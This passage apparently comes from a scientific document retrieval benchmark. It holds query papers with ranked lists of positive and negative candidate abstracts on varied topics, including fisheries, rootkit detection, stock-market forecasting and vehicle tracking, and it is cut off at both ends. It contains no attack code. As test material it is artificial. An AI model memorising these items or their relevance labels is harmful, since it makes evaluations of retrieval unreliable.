for Fisheries and Aquaculture held in Rome from 7 to 9 April 2008. Cassandra De Young also provided comments which improved the report. Climate change and capture fisheries: potential impacts, adaptation and mitigation 109",
"title": ""
},
{
"docid": "bf9ef1e84275ac77be0fd71334dde1ab",
"text": "The development of summarization research has been significantly hampered by the costly acquisition of reference summaries. This paper proposes an effective way to automatically collect large scales of news-related multi-document summaries with reference to social media’s reactions. We utilize two types of social labels in tweets, i.e., hashtags and hyper-links. Hashtags are used to cluster documents into different topic sets. Also, a tweet with a hyper-link often highlights certain key points of the corresponding document. We synthesize a linked document cluster to form a reference summary which can cover most key points. To this aim, we adopt the ROUGE metrics to measure the coverage ratio, and develop an Integer Linear Programming solution to discover the sentence set reaching the upper bound of ROUGE. Since we allow summary sentences to be selected from both documents and highquality tweets, the generated reference summaries could be abstractive. Both informativeness and readability of the collected summaries are verified by manual judgment. In addition, we train a Support Vector Regression summarizer on DUC generic multi-document summarization benchmarks. With the collected data as extra training resource, the performance of the summarizer improves a lot on all the test sets. We release this dataset for further research.",
"title": ""
},
{
"docid": "4dd0d34f6b67edee60f2e6fae5bd8dd9",
"text": "Virtual learning environments facilitate online learning, generating and storing large amounts of data during the learning/teaching process. This stored data enables extraction of valuable information using data mining. In this article, we present a systematic mapping, containing 42 papers, where data mining techniques are applied to predict students performance using Moodle data. Results show that decision trees are the most used classification approach. Furthermore, students interactions in forums are the main Moodle attribute analyzed by researchers.",
"title": ""
},
{
"docid": "7bedcb8eb5f458ba238c82249c80657d",
"text": "The spread of antibiotic-resistant bacteria is a growing problem and a public health issue. In recent decades, various genetic mechanisms involved in the spread of resistance genes among bacteria have been identified. Integrons - genetic elements that acquire, exchange, and express genes embedded within gene cassettes (GC) - are one of these mechanisms. Integrons are widely distributed, especially in Gram-negative bacteria; they are carried by mobile genetic elements, plasmids, and transposons, which promote their spread within bacterial communities. Initially studied mainly in the clinical setting for their involvement in antibiotic resistance, their role in the environment is now an increasing focus of attention. The aim of this review is to provide an in-depth analysis of recent studies of antibiotic-resistance integrons in the environment, highlighting their potential involvement in antibiotic-resistance outside the clinical context. We will focus particularly on the impact of human activities (agriculture, industries, wastewater treatment, etc.).",
"title": ""
},
{
"docid": "b04ae3842293f5f81433afbaa441010a",
"text": "Rootkits Trojan virus, which can control attacked computers, delete import files and even steal password, are much popular now. Interrupt Descriptor Table (IDT) hook is rootkit technology in kernel level of Trojan. The paper makes deeply analysis on the IDT hooks handle procedure of rootkit Trojan according to previous other researchers methods. We compare its IDT structure and programs to find how Trojan interrupt handler code can respond the interrupt vector request in both real address mode and protected address mode. Finally, we analyze the IDT hook detection methods of rootkits Trojan by Windbg or other professional tools.",
"title": ""
},
{
"docid": "9c0db9ac984a93d4a0019dd76e6ccdcf",
"text": "This paper presents a high power efficient broad-band programmable gain amplifier with multi-band switching. The proposed two stage common-emitter amplifier, by using the current reuse topology with a magnetically coupled transformer and a MOS varactor bank as a frequency tunable load, achieves a 55.9% peak power added efficiency (PAE), a peak saturated power of +11.1 dBm, a variable gain from 1.8 to 16 dB, and a tunable large signal 3-dB bandwidth from 24.3 to 35 GHz. The design is fabricated in a commercial 0.18- μm SiGe BiCMOS technology and measured with an output 1-dB gain compression point which is better than +9.6 dBm and a maximum dc power consumption of 22.5 mW from a single 1.8 V supply. The core amplifier, excluding the measurement pads, occupies a die area of 500 μm×450 μm.",
"title": ""
},
{
"docid": "b54215466bcdf86442f9a6e87e831069",
"text": "In this paper, we consider the problem of tracking human motion with a 22-DOF kinematic model from depth images. In contrast to existing approaches, our system naturally scales to multiple sensors. The motivation behind our approach, termed Multiple Depth Camera Approach (MDCA), is that by using several cameras, we can significantly improve the tracking quality and reduce ambiguities as for example caused by occlusions. By fusing the depth images of all available cameras into one joint point cloud, we can seamlessly incorporate the available information from multiple sensors into the pose estimation. To track the high-dimensional human pose, we employ state-of-the-art annealed particle filtering and partition sampling. We compute the particle likelihood based on the truncated signed distance of each observed point to a parameterized human shape model. We apply a coarse-to-fine scheme to recognize a wide range of poses to initialize the tracker. In our experiments, we demonstrate that our approach can accurately track human motion in real-time (15Hz) on a GPGPU. In direct comparison to two existing trackers (OpenNI, Microsoft Kinect SDK), we found that our approach is significantly more robust for unconstrained motions and under (partial) occlusions.",
"title": ""
},
{
"docid": "a5d8fa2e03cb51b30013a9e21477ef61",
"text": "PURPOSE\nThe aim of this study was to establish the role of magnetic resonance imaging (MRI) in patients with Mayer-Rokitansky-Kuster-Hauser syndrome (MRKHS).\n\n\nMATERIALS AND METHODS\nSixteen female MRKHS patients (mean age, 19.4 years; range, 11-39 years) were studied using MRI. Two experienced radiologists evaluated all the images in consensus to assess the presence or absence of the ovaries, uterus, and vagina. Additional urogenital or vertebral pathologies were also noted.\n\n\nRESULTS\nOf the 16 patients, complete aplasia of uterus was seen in five patients (31.3%). Uterine hypoplasia or remnant uterus was detected in 11 patients (68.8%). Ovaries were clearly seen in 10 patients (62.5%), and in two of the 10 patients, no descent of ovaries was detected. In five patients, ovaries could not be detected on MRI. In one patient, agenesis of right ovary was seen, and the left ovary was in normal shape. Of the 16 cases, 11 (68.8%) had no other extragenital abnormalities. Additional abnormalities were detected in six patients (37.5%). Two of the six had renal agenesis, and one patient had horseshoe kidney; renal ectopy was detected in two patients, and one patient had urachal remnant. Vertebral abnormalities were detected in two patients; one had L5 posterior fusion defect, bilateral hemisacralization, and rotoscoliosis, and the other had coccygeal vertebral fusion.\n\n\nCONCLUSION\nMRI is a useful and noninvasive imaging method in the diagnosis and evaluation of patients with MRKHS.",
"title": ""
},
{
"docid": "2e5789bd2089a4b15686a595b79eb7cc",
"text": "Background: The growing prevalence of chronic diseases and home-based treatments has led to the introduction of a large number of instruments for assessing the caregiving-related problems associated with specific diseases, but our Family Strain Questionnaire (FSQ) was designed to provide a basis for general screening and comparison regardless of the disease. We here describe the final validation of its psychometric characteristics. Methods: The FSQ consists of a brief semi-structured interview and 44 dichotomic items, and has now been administered to 811 caregivers (285 were simultaneously administered other questionnaires assessing anxiety and depressive symptoms). After a factorial analysis confirmed the 5-factor structure identified in previous studies (emotional burden, problems in social involvement, need for knowledge about the disease, satisfaction with family relationships, and thoughts about death), we undertook correlation and reliability analyses, and a receiver operating characteristics curve analysis designed to determine the cut-off point for the emotional problems identified by the first factor. Finally, univariate ANOVA with Bonferroni's post-hoc test was used to compare the disease-specific scores. Results: The validity and reliability of the FSQ is good, and its factorial structure refers to areas that are internationally considered as being of general importance. The semi-structured interview collects information concerning the socio-economic status of caregivers and their convictions/interpretations concerning the diseases of their patients. Conclusions: The FSQ can be used as a single instrument for the general assessment of caregiving-related problems regardless of the reference disease. This makes it possible to reduce administration and analysis times, and compare the problems experienced by the caregivers of patients with different diseases.",
"title": ""
},
{
"docid": "4c290421dc42c3a5a56c7a4b373063e5",
"text": "In this paper, we provide a graph theoretical framework that allows us to formally define formations of multiple vehicles and the issues arising in uniqueness of graph realizations and its connection to stability of formations. The notion of graph rigidity is crucial in identifying the shape variables of a formation and an appropriate potential function associated with the formation. This allows formulation of meaningful optimization or nonlinear control problems for formation stabilization/tacking, in addition to formal representation of split, rejoin, and reconfiguration maneuvers for multi-vehicle formations. We introduce an algebra that consists of performing some basic operations on graphs which allow creation of larger rigidby-construction graphs by combining smaller rigid subgraphs. This is particularly useful in performing and representing rejoin/split maneuvers of multiple formations in a distributed fashion.",
"title": ""
},
{
"docid": "5d546a8d21859a057d36cdbd3fa7f887",
"text": "In 1984, a prospective cohort study, Coronary Artery Risk Development in Young Adults (CARDIA) was initiated to investigate life-style and other factors that influence, favorably and unfavorably, the evolution of coronary heart disease risk factors during young adulthood. After a year of planning and protocol development, 5,116 black and white women and men, age 18-30 years, were recruited and examined in four urban areas: Birmingham, Alabama; Chicago, Illinois; Minneapolis, Minnesota, and Oakland, California. The initial examination included carefully standardized measurements of major risk factors as well as assessments of psychosocial, dietary, and exercise-related characteristics that might influence them, or that might be independent risk factors. This report presents the recruitment and examination methods as well as the mean levels of blood pressure, total plasma cholesterol, height, weight and body mass index, and the prevalence of cigarette smoking by age, sex, race and educational level. Compared to recent national samples, smoking is less prevalent in CARDIA participants, and weight tends to be greater. Cholesterol levels are representative and somewhat lower blood pressures in CARDIA are probably, at least in part, due to differences in measurement methods. Especially noteworthy among several differences in risk factor levels by demographic subgroup, were a higher body mass index among black than white women and much higher prevalence of cigarette smoking among persons with no more than a high school education than among those with more education.",
"title": ""
}
] | scidocsrr |
cd62837591ea2eaba85de851d46ae42e | Emerging technologies and research challenges for 5G wireless networks | [
{
"docid": "22255906a7f1d30c9600728a6dc9ad9f",
"text": "The next major step in the evolution of LTE targets the rapidly increasing demand for mobile broadband services and traffic volumes. One of the key technologies is a new carrier type, referred to in this article as a Lean Carrier, an LTE carrier with minimized control channel overhead and cell-specific reference signals. The Lean Carrier can enhance spectral efficiency, increase spectrum flexibility, and reduce energy consumption. This article provides an overview of the motivations and main use cases of the Lean Carrier. Technical challenges are highlighted, and design options are discussed; finally, a performance evaluation quantifies the benefits of the Lean Carrier.",
"title": ""
}
] | [
{
"docid": "f0bac8caa5bfe019400871c5bf760ddc",
"text": "The skill of natural spoken interaction is crucial for artificial intelligent systems. To equip these systems with this skill, model-based statistical dialogue systems are essential. However, this goal is still far from reach. In this paper, the basics of statistical spoken dialogue systems, which play a key role in natural interaction, are presented. Furthermore, I will outline two principal aspects and argue why those are important to achieve natural interactions.",
"title": ""
},
{
"docid": "1114300ff9cab6dc29e80c4d22e45e1e",
"text": "Single- and dual-feed, dual-frequency, low-profile antennas with independent tuning using varactor diodes have been demonstrated. The dual-feed planar inverted F-antenna (PIFA) has two operating frequencies which can be independently tuned from 0.7 to 1.1 GHz and from 1.7 to 2.3 GHz with better than -10 dB impedance match. The isolation between the high-band and the low-band ports is >13 dB; hence, one resonant frequency can be tuned without affecting the other. The single-feed antenna has two resonant frequencies, which can be independently tuned from 1.2 to 1.6 GHz and from 1.6 to 2.3 GHz with better than -10 dB impedance match for most of the tuning range. The tuning is done using varactor diodes with a capacitance range from 0.8 to 3.8 pF, which is compatible with RF MEMS devices. The antenna volumes are 63 × 100 × 3.15 mm3 on er = 3.55 substrates and the measured antenna efficiencies vary between 25% and 50% over the tuning range. The application areas are in carrier aggregation systems for fourth generation (4G) wireless systems.",
"title": ""
},
{
"docid": "4fbd13e1bcbb78bac456addce272cbe6",
"text": "Musical memory is considered to be partly independent from other memory systems. In Alzheimer's disease and different types of dementia, musical memory is surprisingly robust, and likewise for brain lesions affecting other kinds of memory. However, the mechanisms and neural substrates of musical memory remain poorly understood. In a group of 32 normal young human subjects (16 male and 16 female, mean age of 28.0 ± 2.2 years), we performed a 7 T functional magnetic resonance imaging study of brain responses to music excerpts that were unknown, recently known (heard an hour before scanning), and long-known. We used multivariate pattern classification to identify brain regions that encode long-term musical memory. The results showed a crucial role for the caudal anterior cingulate and the ventral pre-supplementary motor area in the neural encoding of long-known as compared with recently known and unknown music. In the second part of the study, we analysed data of three essential Alzheimer's disease biomarkers in a region of interest derived from our musical memory findings (caudal anterior cingulate cortex and ventral pre-supplementary motor area) in 20 patients with Alzheimer's disease (10 male and 10 female, mean age of 68.9 ± 9.0 years) and 34 healthy control subjects (14 male and 20 female, mean age of 68.1 ± 7.2 years). Interestingly, the regions identified to encode musical memory corresponded to areas that showed substantially minimal cortical atrophy (as measured with magnetic resonance imaging), and minimal disruption of glucose-metabolism (as measured with (18)F-fluorodeoxyglucose positron emission tomography), as compared to the rest of the brain. However, amyloid-β deposition (as measured with (18)F-flobetapir positron emission tomography) within the currently observed regions of interest was not substantially less than in the rest of the brain, which suggests that the regions of interest were still in a very early stage of the expected course of biomarker development in these regions (amyloid accumulation → hypometabolism → cortical atrophy) and therefore relatively well preserved. Given the observed overlap of musical memory regions with areas that are relatively spared in Alzheimer's disease, the current findings may thus explain the surprising preservation of musical memory in this neurodegenerative disease.",
"title": ""
},
{
"docid": "3c47a26bfe8221828da80a32b993fbc3",
"text": "Named Entity Recognition (NER) is always limited by its lower recall resulting from the asymmetric data distribution where the NONE class dominates the entity classes. This paper presents an approach that exploits non-local information to improve the NER recall. Several kinds of non-local features encoding entity token occurrence, entity boundary and entity class are explored under Conditional Random Fields (CRFs) framework. Experiments on SIGHAN 2006 MSRA (CityU) corpus indicate that non-local features can effectively enhance the recall of the state-of-the-art NER systems. Incorporating the non-local features into the NER systems using local features alone, our best system achieves a 23.56% (25.26%) relative error reduction on the recall and 17.10% (11.36%) relative error reduction on the F1 score; the improved F1 score 89.38% (90.09%) is significantly superior to the best NER system with F1 of 86.51% (89.03%) participated in the closed track.",
"title": ""
},
{
"docid": "b9147ef0cf66bdb7ecc007a4e3092790",
"text": "This paper is related to the use of social media for disaster management by humanitarian organizations. The past decade has seen a significant increase in the use of social media to manage humanitarian disasters. It seems, however, that it has still not been used to its full potential. In this paper, we examine the use of social media in disaster management through the lens of Attribution Theory. Attribution Theory posits that people look for the causes of events, especially unexpected and negative events. The two major characteristics of disasters are that they are unexpected and have negative outcomes/impacts. Thus, Attribution Theory may be a good fit for explaining social media adoption patterns by emergency managers. We propose a model, based on Attribution Theory, which is designed to understand the use of social media during the mitigation and preparedness phases of disaster management. We also discuss the theoretical contributions and some practical implications. This study is still in its nascent stage and is research in progress.",
"title": ""
},
{
"docid": "05e754e0567bf6859d7a68446fc81bad",
"text": "Bad presentation of medical statistics such as the risks associated with a particular intervention can lead to patients making poor decisions on treatment. Particularly confusing are single event probabilities, conditional probabilities (such as sensitivity and specificity), and relative risks. How can doctors improve the presentation of statistical information so that patients can make well informed decisions?",
"title": ""
},
{
"docid": "bb314530c796fbec6679a4a0cc6cd105",
"text": "The undergraduate computer science curriculum is generally focused on skills and tools; most students are not exposed to much research in the field, and do not learn how to navigate the research literature. We describe how science fiction reviews were used as a gateway to research reviews. Students learn a little about current or recent research on a topic that stirs their imagination, and learn how to search for, read critically, and compare technical papers on a topic related their chosen science fiction book, movie, or TV show.",
"title": ""
},
{
"docid": "05fe74d25c84e46b8044faca8a350a2f",
"text": "BACKGROUND\nAn observational study was conducted in 12 European countries by the European Federation of Clinical Chemistry and Laboratory Medicine Working Group for the Preanalytical Phase (EFLM WG-PRE) to assess the level of compliance with the CLSI H3-A6 guidelines.\n\n\nMETHODS\nA structured checklist including 29 items was created to assess the compliance of European phlebotomy procedures with the CLSI H3-A6 guideline. A risk occurrence chart of individual phlebotomy steps was created from the observed error frequency and severity of harm of each guideline key issue. The severity of errors occurring during phlebotomy was graded using the risk occurrence chart.\n\n\nRESULTS\nTwelve European countries participated with a median of 33 (18-36) audits per country, and a total of 336 audits. The median error rate for the total phlebotomy procedure was 26.9 % (10.6-43.8), indicating a low overall compliance with the recommended CLSI guideline. Patient identification and test tube labelling were identified as the key guideline issues with the highest combination of probability and potential risk of harm. Administrative staff did not adhere to patient identification procedures during phlebotomy, whereas physicians did not adhere to test tube labelling policy.\n\n\nCONCLUSIONS\nThe level of compliance of phlebotomy procedures with the CLSI H3-A6 guidelines in 12 European countries was found to be unacceptably low. The most critical steps in need of immediate attention in the investigated countries are patient identification and tube labelling.",
"title": ""
},
{
"docid": "c1ca7ef76472258c6359111dd4d014d5",
"text": "Online forums contain huge amounts of valuable user-generated content. In current forum systems, users have to passively wait for other users to visit the forum systems and read/answer their questions. The user experience for question answering suffers from this arrangement. In this paper, we address the problem of \"pushing\" the right questions to the right persons, the objective being to obtain quick, high-quality answers, thus improving user satisfaction. We propose a framework for the efficient and effective routing of a given question to the top-k potential experts (users) in a forum, by utilizing both the content and structures of the forum system. First, we compute the expertise of users according to the content of the forum system—-this is to estimate the probability of a user being an expert for a given question based on the previous question answering of the user. Specifically, we design three models for this task, including a profile-based model, a thread-based model, and a cluster-based model. Second, we re-rank the user expertise measured in probability by utilizing the structural relations among users in a forum system. The results of the two steps can be integrated naturally in a probabilistic model that computes a final ranking score for each user. Experimental results show that the proposals are very promising.",
"title": ""
},
{
"docid": "4b630a5cd7d0be0fb083b500f2ac84c2",
"text": "Image processing algorithms are used for converting textual image to editable text. One application could be a car number plate recognition (CNPR) system where these type of algorithms automatically detect the car registration number by capturing an image. In this paper, we improve one of the existing CNPR algorithms. The contributions include: multiple template matching; considering light intensity and recognizing the car number plate even in low intense light and independence of distance of car number plate to camera. The involvement of different conditions and external factors actually improve the CNPR system efficiency. We run different experiments on different car number plates. Our proposed improvements yield better results in terms of false positive and false negative values for CNPR.",
"title": ""
},
{
"docid": "fb83fca1b1ed1fca15542900bdb3748d",
"text": "Learning disease severity scores automatically from collected measurements may aid in the quality of both healthcare and scientific understanding. Some steps in that direction have been taken and machine learning algorithms for extracting scoring functions from data have been proposed. Given the rapid increase in both quantity and diversity of data measured and stored, the large amount of information is becoming one of the challenges for learning algorithms. In this work, we investigated the direction of the problemwhere the dimensionality of measured variables is large. Learning the severity score in such cases brings the issue of which of measured features are relevant. We have proposed a novel approach by combining desirable properties of existing formulations, which compares favorably to alternatives in accuracy and especially in the robustness of the learned scoring function.The proposed formulation has a nonsmooth penalty that induces sparsity.This problem is solved by addressing a dual formulationwhich is smooth and allows an efficient optimization.The proposed approachmight be used as an effective and reliable tool for both scoring function learning and biomarker discovery, as demonstrated by identifying a stable set of genes related to influenza symptoms’ severity, which are enriched in immune-related processes.",
"title": ""
},
{
"docid": "81385958cac7df4cc51b35762e6c2806",
"text": "DDoS attacks remain a serious threat not only to the edge of the Internet but also to the core peering links at Internet Exchange Points (IXPs). Currently, the main mitigation technique is to blackhole traffic to a specific IP prefix at upstream providers. Blackholing is an operational technique that allows a peer to announce a prefix via BGP to another peer, which then discards traffic destined for this prefix. However, as far as we know there is only anecdotal evidence of the success of blackholing. Largely unnoticed by research communities, IXPs have deployed blackholing as a service for their members. In this first-of-its-kind study, we shed light on the extent to which blackholing is used by the IXP members and what effect it has on traffic. Within a 12 week period we found that traffic to more than 7, 864 distinct IP prefixes was blackholed by 75 ASes. The daily patterns emphasize that there are not only a highly variable number of new announcements every day but, surprisingly, there are a consistently high number of announcements (> 1000). Moreover, we highlight situations in which blackholing succeeds in reducing the DDoS attack traffic.",
"title": ""
},
{
"docid": "fc1fd2421184caeebeb8c1f6993b0267",
"text": "Deep neural networks are increasingly being used in a variety of machine learning applications applied to rich user data on the cloud. However, this approach introduces a number of privacy and efficiency challenges, as the cloud operator can perform secondary inferences on the available data. Recently, advances in edge processing have paved the way for more efficient, and private, data processing at the source for simple tasks and lighter models, though they remain a challenge for larger, and more complicated models. In this paper, we present a hybrid approach for breaking down large, complex deep models for cooperative, privacy-preserving analytics. We do this by breaking down the popular deep architectures and fine-tune them in a particular way. We then evaluate the privacy benefits of this approach based on the information exposed to the cloud service. We also asses the local inference cost of different layers on a modern handset for mobile applications. Our evaluations show that by using certain kind of fine-tuning and embedding techniques and at a small processing costs, we can greatly reduce the level of information available to unintended tasks applied to the data feature on the cloud, and hence achieving the desired tradeoff between privacy and performance.",
"title": ""
},
{
"docid": "a016fb3b7e5c4bcf386d775c7c61a887",
"text": "How do journalists mark quoted content as certain or uncertain, and how do readers interpret these signals? Predicates such as thinks, claims, and admits offer a range of options for framing quoted content according to the author’s own perceptions of its credibility. We gather a new dataset of direct and indirect quotes from Twitter, and obtain annotations of the perceived certainty of the quoted statements. We then compare the ability of linguistic and extra-linguistic features to predict readers’ assessment of the certainty of quoted content. We see that readers are indeed influenced by such framing devices — and we find no evidence that they consider other factors, such as the source, journalist, or the content itself. In addition, we examine the impact of specific framing devices on perceptions of credibility.",
"title": ""
},
{
"docid": "c01dd2ae90781291cb5915957bd42ae1",
"text": "Mobile devices have become an important part of our everyday life, harvesting more and more confidential user information. Their portable nature and the great exposure to security attacks, however, call out for stronger authentication mechanisms than simple password-based identification. Biometric authentication techniques have shown potential in this context. Unfortunately, prior approaches are either excessively prone to forgery or have too low accuracy to foster widespread adoption. In this paper, we propose sensor-enhanced keystroke dynamics, a new biometric mechanism to authenticate users typing on mobile devices. The key idea is to characterize the typing behavior of the user via unique sensor features and rely on standard machine learning techniques to perform user authentication. To demonstrate the effectiveness of our approach, we implemented an Android prototype system termed Unagi. Our implementation supports several feature extraction and detection algorithms for evaluation and comparison purposes. Experimental results demonstrate that sensor-enhanced keystroke dynamics can improve the accuracy of recent gestured-based authentication mechanisms (i.e., EER>0.5%) by one order of magnitude, and the accuracy of traditional keystroke dynamics (i.e., EER>7%) by two orders of magnitude.",
"title": ""
},
{
"docid": "615891cdd2860247d7837634bc3478f8",
"text": "An exact probabilistic formulation of the “square root law” conjectured byPrice is given and a probability distribution satisfying this law is defined, for which the namePrice distribution is suggested. Properties of thePrice distribution are discussed, including its relationship with the laws ofLotka andZipf. No empirical support of applicability ofPrice distribution as a model for publication productivity could be found.",
"title": ""
},
{
"docid": "6b18d45d56b9e3f34ce9b983bb8d30a9",
"text": "1. The size of the Mexican overwintering population of monarch butterflies has decreased over the last decade. Approximately half of these butterflies come from the U.S. Midwest where larvae feed on common milkweed. There has been a large decline in milkweed in agricultural fields in the Midwest over the last decade. This loss is coincident with the increased use of glyphosate herbicide in conjunction with increased planting of genetically modified (GM) glyphosate-tolerant corn (maize) and soybeans (soya). 2. We investigate whether the decline in the size of the overwintering population can be attributed to a decline in monarch production owing to a loss of milkweeds in agricultural fields in the Midwest. We estimate Midwest annual monarch production using data on the number of monarch eggs per milkweed plant for milkweeds in different habitats, the density of milkweeds in different habitats, and the area occupied by those habitats on the landscape. 3. We estimate that there has been a 58% decline in milkweeds on the Midwest landscape and an 81% decline in monarch production in the Midwest from 1999 to 2010. Monarch production in the Midwest each year was positively correlated with the size of the subsequent overwintering population in Mexico. Taken together, these results strongly suggest that a loss of agricultural milkweeds is a major contributor to the decline in the monarch population. 4. The smaller monarch population size that has become the norm will make the species more vulnerable to other conservation threats.",
"title": ""
},
{
"docid": "813a0d47405d133263deba0da6da27a8",
"text": "The demands on dielectric material measurements have increased over the years as electrical components have been miniaturized and device frequency bands have increased. Well-characterized dielectric measurements on thin materials are needed for circuit design, minimization of crosstalk, and characterization of signal-propagation speed. Bulk material applications have also increased. For accurate dielectric measurements, each measurement band and material geometry requires specific fixtures. Engineers and researchers must carefully match their material system and uncertainty requirements to the best available measurement system. Broadband measurements require transmission-line methods, and accurate measurements on low-loss materials are performed in resonators. The development of the most accurate methods for each application requires accurate fixture selection in terms of field geometry, accurate field models, and precise measurement apparatus.",
"title": ""
},
{
"docid": "140815c8ccd62d0169fa294f6c4994b8",
"text": "Six specific personality traits – playfulness, chase-proneness, curiosity/fearlessness, sociability, aggressiveness, and distance-playfulness – and a broad boldness dimension have been suggested for dogs in previous studies based on data collected in a standardized behavioural test (‘‘dog mentality assessment’’, DMA). In the present study I investigated the validity of the specific traits for predicting typical behaviour in everyday life. A questionnaire with items describing the dog’s typical behaviour in a range of situations was sent to owners of dogs that had carried out the DMA behavioural test 1–2 years earlier. Of the questionnaires that were sent out 697 were returned, corresponding to a response rate of 73.3%. Based on factor analyses on the questionnaire data, behavioural factors in everyday life were suggested to correspond to the specific personality traits from the DMA. Correlation analyses suggested construct validity for the traits playfulness, curiosity/ fearlessness, sociability, and distance-playfulness. Chase-proneness, which I expected to be related to predatory behaviour in everyday life, was instead related to human-directed play interest and nonsocial fear. Aggressiveness was the only trait from the DMA with low association to all of the behavioural factors from the questionnaire. The results suggest that three components of dog personality are measured in the DMA: (1) interest in playing with humans; (2) attitude towards strangers (interest in, fear of, and aggression towards); and (3) non-social fearfulness. These three components correspond to the traits playfulness, sociability, and curiosity/fearlessness, respectively, all of which were found to be related to a higher-order shyness–boldness dimension. www.elsevier.com/locate/applanim Applied Animal Behaviour Science 91 (2005) 103–128 * Present address: Department of Anatomy and Physiology, Faculty of Veterinary Medicine and Animal Science, Swedish University of Agricultural Sciences, Box 7011, SE-750 07 Uppsala, Sweden. Tel.: +46 18 67 28 21; fax: +46 18 67 21 11. E-mail address: kenth.svartberg@afys.slu.se. 0168-1591/$ – see front matter # 2004 Elsevier B.V. All rights reserved. doi:10.1016/j.applanim.2004.08.030 Chase-proneness and distance-playfulness seem to be mixed measures of these personality components, and are not related to any additional components. Since the time between the behavioural test and the questionnaire was 1–2 years, the results indicate long-term consistency of the personality components. Based on these results, the DMA seems to be useful in predicting behavioural problems that are related to social and non-social fear, but not in predicting other potential behavioural problems. However, considering this limitation, the test seems to validly assess important aspects of dog personality, which supports the use of the test as an instrument in dog breeding and in selection of individual dogs for different purposes. # 2004 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "1eeb833473e87c936ee52c471e6d95ad",
"text": "This study investigated the effects of two game features (the level of challenge and the reward system) on first and second graders' engagement during digital game-based learning of reading. We were particularly interested in determining how well these features managed to maintain children's engagement over the 8-week training period. The children (N ¼ 138) used GraphoGame, a web-based game training letter–sound connections, at home under the supervision of parents. Data regarding the children's gaming and engagement were stored on the GraphoGame online server. A 2 Â 2 factorial design was used to investigate the effects of the level of challenge (high challenge vs. high success) and the presence of the reward system (present vs. absent). Children's engagement was measured by session frequency and duration and through an in-game self-report survey that was presented at the end of the each session. According to the results, the children enjoyed GraphoGame but used it less frequently than expected. The reward system seemed to encourage the children to play longer sessions at the beginning of the training period, but this effect vanished after a few sessions. The level of challenge had no significant effect on children's engagement. The results suggest a need to investigate further the effectiveness of various game features in maintaining learner's engagement until the goals set for learning are achieved. Playing computer games is a popular leisure-time activity among young children. In Finland, 84 percent of first graders play computer games at least sometimes, 31 percent every day (Hirvonen, 2012). Computer games can hold children's attention for hours a day, so it is not surprising that many parents and teachers are interested in their potential as educational and motivational tools. Several studies suggest that children enjoy computer-based learning tasks more than traditional learning tasks Despite the apparent motivational appeal of digital learning, little experimental research concerning the long-term development of engagement during digital game-based learning has been conducted. When computer-based learning activities or games are introduced to young learners, they typically trigger curiosity and interest (Mitchell, 1993; Seymour et al., 1987). However, this type of interest is situational, triggered by environmental stimuli and it may or may not last over time (Hidi & Renninger, 2006). Some earlier studies imply that interest triggered by educational software may be short-, but also relatively long-lasting interest has been observed (Rosas et al., 2003). If the situational interest triggered by a novel learning tool can …",
"title": ""
}
] | scidocsrr |
cb02bc61516fdce7cc055f7a4d0fe5cf | A Stock Market Forecasting Model Combining Two-Directional Two-Dimensional Principal Component Analysis and Radial Basis Function Neural Network | [
{
"docid": "ee11c968b4280f6da0b1c0f4544bc578",
"text": "A report is presented of some results of an ongoing project using neural-network modeling and learning techniques to search for and decode nonlinear regularities in asset price movements. The author focuses on the case of IBM common stock daily returns. Having to deal with the salient features of economic data highlights the role to be played by statistical inference and requires modifications to standard learning techniques which may prove useful in other contexts.<<ETX>>",
"title": ""
},
{
"docid": "2e41b44f2dc3b429f0ff11861ba93a14",
"text": "With the economic successes of several Asian economies and their increasingly important roles in the global financial market, the prediction of Asian stock markets has becoming a hot research area. As Asian stock markets are highly dynamic and exhibit wide variation, it may more realistic and practical that assumed the stock indexes of Asian stock markets are nonlinear mixture data. In this research, a time series prediction model by combining nonlinear independent component analysis (NLICA) and neural network is proposed to forecast Asian stock markets. NLICA is a novel feature extraction technique to find independent sources from observed nonlinear mixture data where no relevant data mixing mechanisms are available. In the proposed method, we first use NLICA to transform the input space composed of original time series data into the feature space consisting of independent components representing underlying information of the original data. Then, the ICs are served as the input variables of the neural network to build prediction model. Among the Asian stock markets, Japanese and China’s stock markets are the biggest two in Asia and they respectively represent the two types of stock markets. Therefore, in order to evaluate the performance of the proposed approach, the Nikkei 225 closing index and Shanghai B-share closing index are used as illustrative examples. Experimental results show that the proposed forecasting model not only improves the prediction accuracy of the neural network approach but also outperforms the three comparison methods. The proposed stock index prediction model can be therefore a good alternative for Asian stock market indexes. 2011 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "3f6b32bdad3a7ef0302db37f1c44569a",
"text": "In this paper we propose and analyze a novel method for automatic stock trading which combines technical analysis and the nearest neighbor classification. Our first and foremost objective is to study the feasibility of the practical use of an intelligent prediction system exclusively based on the history of daily stock closing prices and volumes. To this end we propose a technique that consists of a combination of a nearest neighbor classifier and some well known tools of technical analysis, namely, stop loss, stop gain and RSI filter. For assessing the potential use of the proposed method in practice we compared the results obtained to the results that would be obtained by adopting a buy-and-hold strategy. The key performance measure in this comparison was profitability. The proposed method was shown to generate considerable higher profits than buy-and-hold for most of the companies, with few buy operations generated and, consequently, minimizing the risk of market exposure. 2010 Elsevier Ltd. All rights reserved.",
"title": ""
}
] | [
{
"docid": "f90967525247030b9da04fc4c37b6c14",
"text": "Vehicle tracking using airborne wide-area motion imagery (WAMI) for monitoring urban environments is very challenging for current state-of-the-art tracking algorithms, compared to object tracking in full motion video (FMV). Characteristics that constrain performance in WAMI to relatively short tracks range from the limitations of the camera sensor array including low frame rate and georegistration inaccuracies, to small target support size, presence of numerous shadows and occlusions from buildings, continuously changing vantage point of the platform, presence of distractors and clutter among other confounding factors. We describe our Likelihood of Features Tracking (LoFT) system that is based on fusing multiple sources of information about the target and its environment akin to a track-before-detect approach. LoFT uses image-based feature likelihood maps derived from a template-based target model, object and motion saliency, track prediction and management, combined with a novel adaptive appearance target update model. Quantitative measures of performance are presented using a set of manually marked objects in both WAMI, namely Columbus Large Image Format (CLIF), and several standard FMV sequences. Comparison with a number of single object tracking systems shows that LoFT outperforms other visual trackers, including state-of-the-art sparse representation and learning based methods, by a significant amount on the CLIF sequences and is competitive on FMV sequences.",
"title": ""
},
{
"docid": "ea6392b6a49ed40cb5e3779e0d1f3ea2",
